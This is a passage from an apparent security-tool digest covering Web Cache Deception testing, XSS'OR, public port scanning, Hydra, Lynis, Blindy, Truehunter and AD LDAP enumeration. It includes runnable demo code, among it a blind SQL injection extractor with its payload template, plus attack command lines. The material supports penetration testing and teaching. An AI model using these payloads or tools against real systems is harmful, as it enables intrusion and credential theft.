    Please read the conf/default.conf file to learn how to configure PhishingKitHunter.


    Airachnid Burp Extension - A Burp Extension to test applications for vulnerability to the Web Cache Deception attack


    A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
    Once the extension has been loaded, go to the Target - Site map tab and right-click the resource that should be tested. A context-sensitive menu item called "Airachnid Web Cache Test" is shown and can be used to run the test. If the resource is vulnerable, an Issue is created detailing the vulnerability.
    The context-sensitive menu item is also available for requests in the Proxy - HTTP history tab.

    Installation
    • Download the Airachnid.jar file.
    • In Burp Suite open Extender tab. In Extensions tab, click Add button.
    • Choose downloaded jar file -> Next.
    • Check installation for no error messages.

    Vulnerability
    In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).
    The Web Cache Deception attack can be devastating in its consequences, yet is very simple to execute:
    1. The attacker coerces the victim into opening a link on the legitimate application server that contains the payload.
    2. The attacker opens the newly cached page on the server using the same link and sees exactly the page the victim saw.
    Of course, the attack only matters when the vulnerable resource returns sensitive data that the attacker could not otherwise reach.
    The attack depends on a very specific set of circumstances to make the application vulnerable:
    1. The application only reads the first part of the URL to determine the resource to return.
    If the victim requests:
    https://www.example.com/my_profile
    The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for
    https://www.example.com/my_profile_test
    It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like
    https://www.example.com/my_profile/test
    2. The application stack caches resources according to their file extensions rather than by cache header values. If the application stack has been configured to cache image files, it will cache all resources with .jpg, .png or .gif extensions. That means that e.g. the image at
    https://www.example.com/images/dog.jpg
    Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).

    Attack
    These preconditions can be exploited for the Web Cache Deception attack in the following manner:

    Step 1: An attacker entices the victim to open a maliciously crafted link:
      https://www.example.com/my_profile/test.jpg
    • The application ignores the 'test.jpg' part of the URL, the victim profile page is loaded.
    • The caching mechanism identifies the resource as an image, caching it.  

    Step 2: The attacker sends a GET request for the cached page:
    https://www.example.com/my_profile/test.jpg
    • The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).
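Both preconditions, and the two places a fix can go, can be replayed offline. The block below is an added example written for this page, not part of Airachnid: a tiny origin and a tiny shared cache are modelled as Python functions. The vulnerable origin routes /my_profile by prefix (precondition 1) and the naive cache stores anything whose URL ends in an image extension (precondition 2); origin_fixed shows the application-side fix (exact route matching plus explicit Cache-Control) and Cache(honour_headers=True) the infrastructure-side fix (cache only what the origin marks public). Sessions, users and URLs are constructed for the demo.

```python
"""Runnable model of the Web Cache Deception preconditions and two fixes.

Added example, not Airachnid code. Origin and cache are plain functions so
both steps of the attack can be replayed offline; all data is constructed.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional

SESSIONS = {"sess-victim": "victim", "sess-attacker": "attacker"}  # constructed
STATIC_EXT = (".jpg", ".png", ".gif")


@dataclass
class Response:
    status: int
    body: str
    headers: Dict[str, str] = field(default_factory=dict)


def origin_vulnerable(path: str, cookie: Optional[str]) -> Response:
    """Precondition 1: routes by URL prefix and ignores whatever follows it."""
    user = SESSIONS.get(cookie)
    if path.startswith("/my_profile"):
        if user is None:
            return Response(302, "redirect to login", {"Location": "/login"})
        return Response(200, f"profile of {user}, email {user}@example.com")
    if path.startswith("/images/"):
        return Response(200, "<image bytes>", {"Content-Type": "image/jpeg"})
    return Response(404, "not found")


def origin_fixed(path: str, cookie: Optional[str]) -> Response:
    """Fix A (application): exact route match, plus explicit Cache-Control so no
    intermediary can mistake a private page for a static asset."""
    user = SESSIONS.get(cookie)
    if path == "/my_profile":
        if user is None:
            return Response(302, "redirect to login", {"Location": "/login"})
        return Response(200, f"profile of {user}, email {user}@example.com",
                        {"Content-Type": "text/html", "Cache-Control": "private, no-store"})
    if path.startswith("/images/"):
        return Response(200, "<image bytes>",
                        {"Content-Type": "image/jpeg", "Cache-Control": "public, max-age=3600"})
    return Response(404, "not found")


class Cache:
    """Shared cache in front of an origin, keyed on URL only (never on cookies).
    honour_headers=False is precondition 2: cache by file extension.
    honour_headers=True is fix B: cache only what the origin marks public."""

    def __init__(self, origin: Callable[[str, Optional[str]], Response], honour_headers: bool):
        self.origin = origin
        self.honour_headers = honour_headers
        self.store: Dict[str, Response] = {}

    def _cacheable(self, path: str, resp: Response) -> bool:
        if resp.status != 200:
            return False
        if self.honour_headers:
            return "public" in resp.headers.get("Cache-Control", "")
        return path.endswith(STATIC_EXT)

    def get(self, path: str, cookie: Optional[str] = None) -> Response:
        hit = self.store.get(path)
        if hit is not None:
            return hit                    # served to anyone asking for this URL
        resp = self.origin(path, cookie)
        if self._cacheable(path, resp):
            self.store[path] = resp
        return resp


CRAFTED = "/my_profile/test.jpg"


def run_attack(cache: Cache) -> str:
    """Step 1: the victim opens the crafted link while logged in.
    Step 2: the attacker requests the same URL with no session at all."""
    cache.get(CRAFTED, cookie="sess-victim")
    return cache.get(CRAFTED, cookie=None).body
```

run_attack() against Cache(origin_vulnerable, honour_headers=False) hands the attacker the victim's profile; either fix alone breaks the chain, which is also why the Burp check is a two-request test: fetch the suffixed URL with the victim's session, then again with none, and compare the bodies.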

    XSS'OR - Hack with JavaScript


    XSS'OR is a free online tool for hacking with JavaScript.

    It contains three major modules:
    1. Encode/Decode
    The Encode/Decode module, including:
    • front-end encryption and decryption;
    • code compression, decompression, beautification, the implementation of testing;
    • character set conversion, hash generation;
    • and so on.

    2. Codz
    The Code module, including:
    • CSRF request code generation;
    • AJAX request code generation;
    • XSS attack Vector;
    • XSS attack Payload;
    • and so on.
    3. Probe
    The Probe module. To keep the service's load balanced it offers only the most basic probe, and each IP address can generate one unique probe per day. You can use this probe for attack testing (XSS, phishing, etc.). The probe collects basic information about the target user, and you can dynamically inject more commands (JavaScript Codz) for "remote control" testing.

    Some user experience and privacy considerations:
    Even if your browser is accidentally closed or crashes, your XSS'OR records will not be lost, because the relevant records are cached locally in your browser. The server stores none of your private data; the only exception is the probe's result records, which by design are cached temporarily on the server and are automatically cleared every day.


    scanless - Public Port Scan Scrapper


    Command-line utility for using websites that can perform port scans on your behalf. Useful in the early stages of a penetration test, or when you want a port scan of a host that does not originate from your own IP address. Note that each site scans only its own fixed list of ports (compare the outputs below), and that the site operator sees both your IP address and the target you asked about.

    scanless (adj): lacking respectable morals. That girl is scanless!

    Public Port Scanners

    Usage
    Requires the requests and bs4 (BeautifulSoup) libraries; install them with pip.
    $ python scanless.py --help
    usage: scanless.py [-h] [-t TARGET] [-s SCANNER] [-l] [-a]

    scanless, public port scan scrapper

    optional arguments:
    -h, --help show this help message and exit
    -t TARGET, --target TARGET
    ip or domain to scan
    -s SCANNER, --scanner SCANNER
    scanner to use (default: yougetsignal)
    -l, --list list scanners
    -a, --all use all the scanners

    $ python scanless.py --list
    Scanner Name | Website
    ---------------|------------------------------
    yougetsignal | http://www.yougetsignal.com
    viewdns | http://viewdns.info
    hackertarget | https://hackertarget.com
    ipfingerprints | http://www.ipfingerprints.com
    pingeu | http://ping.eu

    $ python scanless.py -s viewdns -t scanme.nmap.org
    Running scanless...

    ------- viewdns -------
    PORT STATE SERVICE
    21/tcp closed ftp
    22/tcp open ssh
    23/tcp closed telnet
    25/tcp closed smtp
    53/tcp closed dns
    80/tcp open http
    110/tcp closed pop3
    139/tcp closed netbios
    143/tcp closed imap
    443/tcp closed https
    445/tcp closed smb
    1433/tcp closed mssql
    1521/tcp closed oracle
    3306/tcp closed mysql
    3389/tcp closed rdp
    -----------------------

    $ python scanless.py -a -t scanme.nmap.org
    Running scanless...

    ------- yougetsignal -------
    PORT STATE SERVICE
    21/tcp closed ftp
    22/tcp open ssh
    23/tcp closed telnet
    25/tcp closed smtp
    53/tcp closed dns
    80/tcp open http
    110/tcp closed pop3
    115/tcp closed sftp
    135/tcp closed msrpc
    139/tcp closed netbios
    143/tcp closed imap
    194/tcp closed irc
    443/tcp closed https
    445/tcp closed smb
    1433/tcp closed mssql
    3306/tcp closed mysql
    3389/tcp closed rdp
    5632/tcp closed pcanywhere
    5900/tcp closed vnc
    6112/tcp closed wc3
    ----------------------------

    ------- viewdns -------
    PORT STATE SERVICE
    21/tcp closed ftp
    22/tcp open ssh
    23/tcp closed telnet
    25/tcp closed smtp
    53/tcp closed dns
    80/tcp open http
    110/tcp closed pop3
    139/tcp closed netbios
    143/tcp closed imap
    443/tcp closed https
    445/tcp closed smb
    1433/tcp closed mssql
    1521/tcp closed oracle
    3306/tcp closed mysql
    3389/tcp closed rdp
    -----------------------

    ------- hackertarget -------
    Starting Nmap 7.01 ( https://nmap.org ) at 2017-05-06 02:31 UTC
    Nmap scan report for scanme.nmap.org (45.33.32.156)
    Host is up (0.065s latency).
    Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
    PORT STATE SERVICE VERSION
    21/tcp closed ftp
    22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    23/tcp closed telnet
    25/tcp closed smtp
    80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
    110/tcp closed pop3
    143/tcp closed imap
    443/tcp closed https
    445/tcp closed microsoft-ds
    3389/tcp closed ms-wbt-server
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
    ----------------------------

    ------- ipfingerprints -------
    Host is up (0.16s latency).
    Not shown: 484 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    111/tcp filtered rpcbind
    135/tcp filtered msrpc
    136/tcp filtered profile
    137/tcp filtered netbios-ns
    138/tcp filtered netbios-dgm
    139/tcp filtered netbios-ssn
    445/tcp filtered microsoft-ds
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.11 - 3.14
    Network Distance: 10 hops
    ------------------------------

    ------- pingeu -------
    PORT STATE SERVICE
    21/tcp closed ftp
    22/tcp open ssh
    23/tcp closed telnet
    25/tcp closed smtp
    53/tcp closed dns
    80/tcp open http
    139/tcp closed netbios
    443/tcp closed https
    445/tcp closed smb
    3389/tcp closed rdp
    ----------------------
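    The five scanners above report different port lists and, for 445/tcp, different states (closed from most sites, filtered from ipfingerprints). As an added example, not part of scanless itself, here is a parser for the block format scanless prints, with a merge step that flags the ports on which the public scanners disagree and keeps the version strings that only the nmap-backed scanner supplies. SAMPLE is a shortened copy of the output shown above; the function names are mine.

```python
# Added example (not part of scanless): parse the per-scanner blocks that
# 'scanless -a' prints and merge them into one view.  SAMPLE is a shortened
# copy of the output above; parse_scanless/merge/versions are my names.
import re
from collections import defaultdict

SAMPLE = """\
Running scanless...

------- yougetsignal -------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp closed smb
----------------------------

------- hackertarget -------
Starting Nmap 7.01 ( https://nmap.org ) at 2017-05-06 02:31 UTC
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
445/tcp closed microsoft-ds
----------------------------

------- ipfingerprints -------
Not shown: 484 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp filtered microsoft-ds
------------------------------
"""

# "------- name -------" opens a scanner block; the closing dash line does not match.
BLOCK_RE = re.compile(r"^-+ (\S+) -+$")
# "22/tcp open ssh [version text...]"; banner and "Not shown" lines fall through.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)(?:\s+(.*))?$")


def parse_scanless(text):
    """Return {scanner: {(port, proto): (state, service, version)}}."""
    results, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = BLOCK_RE.match(line)
        if m:
            current = m.group(1)
            results[current] = {}
            continue
        m = PORT_RE.match(line)
        if m and current:
            port, proto, state, service, version = m.groups()
            results[current][(int(port), proto)] = (state, service, version or "")
    return results


def merge(results):
    """Per port: every state reported, which scanners saw it open, and whether
    they disagree.  A closed/filtered split usually says more about a scanner's
    own egress filtering than about the target, so it is worth a second look."""
    by_port = defaultdict(dict)
    for scanner, ports in results.items():
        for key, (state, _service, _version) in ports.items():
            by_port[key][scanner] = state
    merged = {}
    for key, states in sorted(by_port.items()):
        distinct = set(states.values())
        merged[key] = {
            "states": sorted(distinct),
            "open_by": sorted(s for s, st in states.items() if st == "open"),
            "disagree": len(distinct) > 1,
        }
    return merged


def versions(results):
    """Version strings, present only where a scanner ran nmap -sV."""
    return {key: ver for ports in results.values()
            for key, (_state, _service, ver) in ports.items() if ver}


if __name__ == "__main__":
    parsed = parse_scanless(SAMPLE)
    for key, info in merge(parsed).items():
        flag = "  <-- scanners disagree" if info["disagree"] else ""
        print("%d/%s %s open_by=%s%s" % (key[0], key[1], info["states"], info["open_by"], flag))
    print(versions(parsed))
```

    Run against the full output above, 445/tcp is the only port flagged; the version dictionary picks up the OpenSSH and Apache banners from the hackertarget block.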


    Hydra 8.5 - Network Logon Cracker

    A very fast network logon cracker which supports many different services.

    See the feature sets and services coverage page, which includes a speed comparison against ncrack and medusa. Passwords are one of the biggest security holes, as every password security study shows.

    This tool is proof-of-concept code, giving researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

    Several other login cracker tools are already available, but none of them supports both attacking more than one protocol and parallelized connections.

    It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

    Currently this tool supports the following protocols:
    Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

    CHANGELOG for 8.5
    ===================
    ! Development moved to a public github repository: https://github.com/vanhauser-thc/thc-hydra

    ! Reports came in that the rdp module is sometimes not working reliably, most likely against new Windows versions. please test, report and if possible send a fix
    * New command line option:
    -b : format option for -o output file (json only so far, happy for patches supporting others :) ) - thanks to veggiespam for the patch
    * ./configure now honors the CC environment variable if present
    * Fix for the restore file crash on some x64 platforms (finally! thanks to lukas227!)
    * Changed the format of the restore file to detect cross platform copies
    * Fixed a bug in the NCP module
    * Favor strrchr() over rindex()
    * Added refactoring patch by diadlo
    * Updated man page with missing command line options


    Lynis 2.5.0 - Security Auditing Tool for Unix/Linux Systems


    We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next step in the simplification improvements we have been making. There is a risk of breaking your existing configuration.

    Lynis is an open source security auditing tool. Used by system administrators, security professionals, and auditors, to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

    Supported operating systems

    The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
    • AIX
    • FreeBSD
    • HP-UX
    • Linux
    • Mac OS
    • NetBSD
    • OpenBSD
    • Solaris
    • and others
    It even runs on systems like the Raspberry Pi and several storage devices!

    Installation optional

    Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

    How it works

    Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initializing the program up to the report.

    Steps
    1. Determine operating system
    2. Search for available tools and utilities
    3. Check for Lynis update
    4. Run tests from enabled plugins
    5. Run security tests per category
    6. Report status of security scan
    Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

    Opportunistic scanning

    Lynis scanning is opportunistic: it uses what it can find.
    For example if it sees you are running Apache, it will perform an initial round of Apache related tests. When during the Apache scan it also discovers a SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it then will collect discovered certificates, so they can be scanned later as well.

    In-depth security scans

    By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

    Use cases

    Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
    • Security auditing
    • Compliance testing (e.g. PCI, HIPAA, SOx)
    • Vulnerability detection and scanning
    • System hardening

    Resources used for testing

    Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
    • Best practices
    • CIS
    • NIST
    • NSA
    • OpenSCAP data
    • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

    Lynis Plugins

    Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.

    Changelog
    Upgrade note
    During the development of this release, the project got informed about a flaw
    that possibly could be abused by a local attacker. Even with the small risk of
    success, upgrading is highly recommended. See details on
    [CVE-2017-8108](https://cisofy.com/security/cve/cve-2017-8108/)

    This release is a special maintenance release with focus on cleaning up the code
    for readability and future expansion.

    Changes:
    --------
    * Use ROOTDIR variable instead of fixed paths
    * Introduction of IsEmpty and HasData functions for readability of code
    * Renamed some variables to better indicate their purpose (counting, data type)
    * Removal of unused code and comments
    * Deleted unused tests from database file
    * Correct levels of indentation
    * Support for older mac OS X versions (Lion and Mountain Lion)
    * Initialized variables for more binaries
    * Additional sysctls are tested

    Tests:
    ------
    * MALW-3280 - Extended test with Symantec components
    * PKGS-7332 - Detection of macOS ports tool and installed packages
    * TOOL-5120 - Snort detection
    * TOOL-5122 - Snort configuration file


    Infoga v3.0 - Email Information Gathering


    Infoga is a tool for gathering e-mail account information from different public sources (search engines, PGP key servers). It is a really simple tool, but very effective for the early stages of a penetration test, or just to learn how visible your company is on the Internet.

    Installation

    git clone https://github.com/m4ll0k/Infoga.git
    cd Infoga
    pip install -r requires.txt
    python infoga.py

    ScreenShots


    Blindy - Simple Script for running BruteForce Blind MySql Injection


    Simple script for running bruteforce blind MySql injection
    The script runs through the queries listed in sets in the provided file (default-queries.json by default) and tries to bruteforce the places marked with a {} placeholder. If no {} placeholder is present, the script simply makes a request with the current query.

    command line
    $ python3 blindy.py --help
    usage: blindy.py [-h] [-f filename] [-m method] -p name -r regexp -u url
    [-s set_of_queries]

    Run blind sql injection using brutforce

    optional arguments:
    -h, --help show this help message and exit
    -f filename File name for your commands in json format, defaults
    to default-queries.json
    -m method, --method method
    Where to inject (GET - get parameter/default, POST -
    post parameter, HEADER - header)
    -p name Name of parameter (for get - param name, post - param
    name, for header - name of header). If params need to
    have fixed value use -p submit=true
    -r regexp Regular expression for negative pattern (script search
    for the pattern and if present - will consider that
    injection failed and igrone result.)
    -u url Url to test
    -s set_of_queries, --set set_of_queries
    Which set of queries to analyze from json file, for
    ex. login, blind. Default to blind.

    Example usage
    Bruteforce inject into POST query_param
    python3 blindy.py -m POST -p query_param -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
    Bruteforce inject into POST query_param with placeholder
    python3 blindy.py -m POST -p "query_param=login {}" -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/index.php -s blind
    This injects the queries in place of the {} placeholder in the parameter value.
    Simply check a list of queries against the username parameter
    python3 blindy.py -m POST -p username -p submit=1 -r 'Pattern\ to\ ignore\ result' -u http://example.com/login.php -s login
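    The boolean-based technique Blindy automates, run end-to-end as an added example (not Blindy's own code): a login query built by string concatenation is the injection point, the {} placeholder in the payload template is filled with one candidate character at a time, and a response matching the negative pattern ("Login failed") means the injected condition was false. The in-memory SQLite application, its users table, the secret and the template are constructed for this page; the parameterised login beside it shows why the same loop extracts nothing from a fixed application.

```python
# Added example, not Blindy's code: boolean-based blind extraction against an
# in-memory SQLite app built here.  The users table, the secret 's3cret9',
# the 'Login failed' negative pattern and the payload template are constructed.
import re
import sqlite3
import string

ALPHABET = string.ascii_lowercase + string.digits  # candidate set for the {} slot


def build_app():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret9')")  # constructed
    return db


def login_vulnerable(db, username, password):
    """String-built query: the injection point the blind loop targets."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    row = db.execute(sql).fetchone()
    return "Welcome %s" % row[0] if row else "Login failed"


def login_fixed(db, username, password):
    """Parameterised query: the payload is compared as a literal string."""
    row = db.execute("SELECT username FROM users WHERE username = ? "
                     "AND password = ?", (username, password)).fetchone()
    return "Welcome %s" % row[0] if row else "Login failed"


def blind_extract(oracle, negative, max_len=32):
    """For each position, try every character in the {} placeholder and keep
    the one whose response does NOT match the negative pattern.  Stops when no
    candidate matches: end of the string, or a character outside ALPHABET."""
    template = "admin' AND SUBSTR(password,{pos},1)='{}'-- "
    found = ""
    for pos in range(1, max_len + 1):
        for c in ALPHABET:
            payload = template.format(c, pos=pos)
            if not re.search(negative, oracle(payload, "x")):
                found += c
                break
        else:
            break
    return found


if __name__ == "__main__":
    db = build_app()
    print("vulnerable:", blind_extract(lambda u, p: login_vulnerable(db, u, p), "Login failed"))
    print("fixed:     ", repr(blind_extract(lambda u, p: login_fixed(db, u, p), "Login failed")))
```

    Each position costs at most len(ALPHABET) requests; Blindy's -r option is exactly this negative pattern, and the -p "query_param=login {}" form corresponds to the template string here.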


    Truehunter - Tool to detect TrueCrypt containers


    The goal of Truehunter is to detect TrueCrypt containers using a fast and memory efficient approach. It was designed as a PoC some time ago as I couldn't find any open source tool with the same functionality.

    Installation
    Just run it with Python 2.7; it does not need any additional libraries.

    usage: truehunter.py [-h] [-D HEADERSFILE] [-m MINSIZE] [-M MAXSIZE]
    [-R MAXHEADER] [-f] [-o OUTPUTFILE]
    LOCATION
    Checks for file size, unknown header, and entropy of files to determine if
    they are encrypted containers.
    positional arguments:
    LOCATION Drive or directory to scan.
    optional arguments:
    -h, --help show this help message and exit.
    -D HEADERSFILE, --database HEADERSFILE
    Headers database file, default headers.db
    -m MINSIZE, --minsize MINSIZE
    Minimum file size in Kb, default 1Mb.
    -M MAXSIZE, --maxsize MAXSIZE
    Maximum file size in Kb, default 100Mb.
    -R MAXHEADER, --repeatHeader MAXHEADER
    Discard files with unknown headers repeated more than
    N times, default 3.
    -f, --fast Do not calculate entropy.
    -o OUTPUTFILE, --outputfile OUTPUTFILE
    Scan results file name, default scan_results.csv
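    The usage text names the three signals Truehunter combines: a file size window, a header that matches no known format, and the entropy of the content. As an added example, not Truehunter's code, here are those checks applied to sample files built in memory. The small header table standing in for headers.db, the 7.9 bits/byte threshold and the sample contents are my assumptions; a TrueCrypt volume has no magic bytes and looks random from byte zero, which is why a candidate must pass all three tests and why a compressed PNG, equally high in entropy, is rejected by the header check first.

```python
# Added example (not Truehunter's code): size window, unrecognised header and
# byte entropy applied to constructed in-memory samples.  The header table,
# thresholds and sample contents are assumptions made for this demonstration.
import math
import os
import random
from collections import Counter

# Tiny stand-in for headers.db: leading magic bytes of common formats.
KNOWN_HEADERS = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
    b"%PDF-": "pdf",
    b"\x7fELF": "elf",
    b"\x1f\x8b": "gzip",
}
ENTROPY_THRESHOLD = 7.9   # bits per byte: random data ~8.0, English text ~4.5
SAMPLE_BYTES = 64 * 1024  # how much of each file feeds the entropy estimate


def entropy(data):
    """Shannon entropy of a byte string, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def known_header(data):
    """Name of the first matching magic, or None for an unknown header."""
    for magic, name in KNOWN_HEADERS.items():
        if data.startswith(magic):
            return name
    return None


def classify(head, size, min_size=1024, max_size=100 * 1024 * 1024):
    """head: the leading bytes of the file; size: its full length."""
    fmt = known_header(head[:16])
    ent = entropy(head[:SAMPLE_BYTES])
    size_ok = min_size <= size <= max_size
    return {"size_ok": size_ok, "header": fmt, "entropy": round(ent, 3),
            "candidate": size_ok and fmt is None and ent >= ENTROPY_THRESHOLD}


def scan_directory(root, **limits):
    """Walk a real directory tree and return (path, verdict) for candidates."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                size = os.path.getsize(path)
                with open(path, "rb") as fh:
                    head = fh.read(SAMPLE_BYTES)
            except OSError:
                continue
            verdict = classify(head, size, **limits)
            if verdict["candidate"]:
                hits.append((path, verdict))
    return hits


def samples():
    """Constructed inputs: a 'container' of seeded pseudo-random bytes, plain
    text, a PNG-tagged random blob, and a file below the size floor."""
    rng = random.Random(1)
    noise = bytes(rng.getrandbits(8) for _ in range(16384))
    return {
        "container": noise,
        "text": b"The quick brown fox jumps over the lazy dog. " * 200,
        "png": b"\x89PNG\r\n\x1a\n" + noise,
        "small": noise[:100],
    }


if __name__ == "__main__":
    for name, data in samples().items():
        print(name, classify(data, len(data)))
```

    Reading only the first 64 KiB per file is what keeps the approach fast and memory-efficient on a whole drive; the -R/--repeatHeader option in the usage above addresses the remaining false positives, files of some proprietary format whose unknown header shows up again and again.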


    Ad-LDAP-Enum - Active Directory LDAP Enumerator


    ad-ldap-enum is a Python script that was developed to discover users and their group memberships from Active Directory. In large Active Directory environments, tools such as NBTEnum were not performing fast enough. By executing LDAP queries against a domain controller, ad-ldap-enum is able to target specific Active Directory attributes and build out group membership quickly.
    ad-ldap-enum outputs three tab delimited files 'Domain Group Membership.tsv', 'Extended Domain User Information.tsv', and 'Extended Domain Computer Information.tsv'. The first file contains users, computers, groups, and their memberships. The second file contains users and extra information about the users from Active Directory (e.g. a user's home folder or email address). The third file contains devices in the Domain Computers group and extra information about them from Active Directory (e.g. operating system type and service pack version).
    ad-ldap-enum supports both authenticated and unauthenticated LDAP connections. Additionally, ad-ldap-enum can process nested groups and display a user's actual group membership.

    Requirements
    The package python-ldap is required for the script to execute. This can be installed with the following command:
    pip install python-ldap

    Usage
    ad-ldap-enum.py [-h] -l LDAP_SERVER -d DOMAIN [-a ALT_DOMAIN] [-e] [-n] [-u USERNAME] [-p PASSWORD] [-v]

    Active Directory LDAP Enumerator

    optional arguments:
    -h, --help show this help message and exit
    -v, --verbose Display debugging information.
    -o FILENAME_PREPEND, --prepend FILENAME_PREPEND Prepend a string to all output file names.

    Server Parameters:
    -l LDAP_SERVER, --server LDAP_SERVER IP address of the LDAP server.
    -d DOMAIN, --domain DOMAIN Authentication account's FQDN. If an alternative domain is not specified this will be also used as the Base DN for searching LDAP.
    -a ALT_DOMAIN, --alt-domain ALT_DOMAIN Alternative FQDN to use as the Base DN for searching LDAP.
    -e, --nested Expand nested groups.

    Authentication Parameters:
    -n, --null Use a null binding to authenticate to LDAP.
    -u USERNAME, --username USERNAME Authentication account's username.
    -p PASSWORD, --password PASSWORD Authentication account's password.

    Example
    python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
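    The step the text describes as showing a user's actual group membership (the -e/--nested behaviour) is a transitive closure over the member attribute of group objects. As an added example, not taken from ad-ldap-enum, here it is on a small constructed directory of the shape an LDAP search for (objectClass=group) with attributes member and sAMAccountName returns. The DNs, names and the deliberate Helpdesk/Tier0 Ops nesting loop are invented; Active Directory does not prevent circular nesting, so the resolver has to tolerate it.

```python
# Added example (not from ad-ldap-enum): nested group resolution from the
# 'member' attribute, cycle-safe.  DIRECTORY is a constructed stand-in for
# LDAP search results; every DN and account name below is invented.
from collections import defaultdict

DIRECTORY = {
    "CN=Domain Admins,CN=Users,DC=contoso,DC=com": {
        "objectClass": ["group"],
        "sAMAccountName": "Domain Admins",
        "member": ["CN=Tier0 Ops,OU=Groups,DC=contoso,DC=com",
                   "CN=Administrator,CN=Users,DC=contoso,DC=com"],
    },
    "CN=Tier0 Ops,OU=Groups,DC=contoso,DC=com": {
        "objectClass": ["group"],
        "sAMAccountName": "Tier0 Ops",
        "member": ["CN=Helpdesk,OU=Groups,DC=contoso,DC=com"],
    },
    "CN=Helpdesk,OU=Groups,DC=contoso,DC=com": {
        "objectClass": ["group"],
        "sAMAccountName": "Helpdesk",
        # nesting loop on purpose: Helpdesk contains Tier0 Ops, which contains Helpdesk
        "member": ["CN=Tier0 Ops,OU=Groups,DC=contoso,DC=com",
                   "CN=bob,OU=Staff,DC=contoso,DC=com"],
    },
    "CN=Administrator,CN=Users,DC=contoso,DC=com": {
        "objectClass": ["user"], "sAMAccountName": "Administrator",
    },
    "CN=bob,OU=Staff,DC=contoso,DC=com": {
        "objectClass": ["user"], "sAMAccountName": "bob",
    },
}


def parent_groups(directory):
    """Invert the member lists: member DN -> set of group DNs holding it."""
    parents = defaultdict(set)
    for dn, attrs in directory.items():
        if "group" in attrs["objectClass"]:
            for member in attrs.get("member", []):
                parents[member].add(dn)
    return parents


def effective_groups(directory, dn):
    """Transitive closure of dn's parent groups; 'seen' breaks nesting loops."""
    parents = parent_groups(directory)
    seen, stack = set(), list(parents[dn])
    while stack:
        group = stack.pop()
        if group in seen:
            continue
        seen.add(group)
        stack.extend(parents[group])
    return sorted(directory[g]["sAMAccountName"] for g in seen)


def membership_report(directory):
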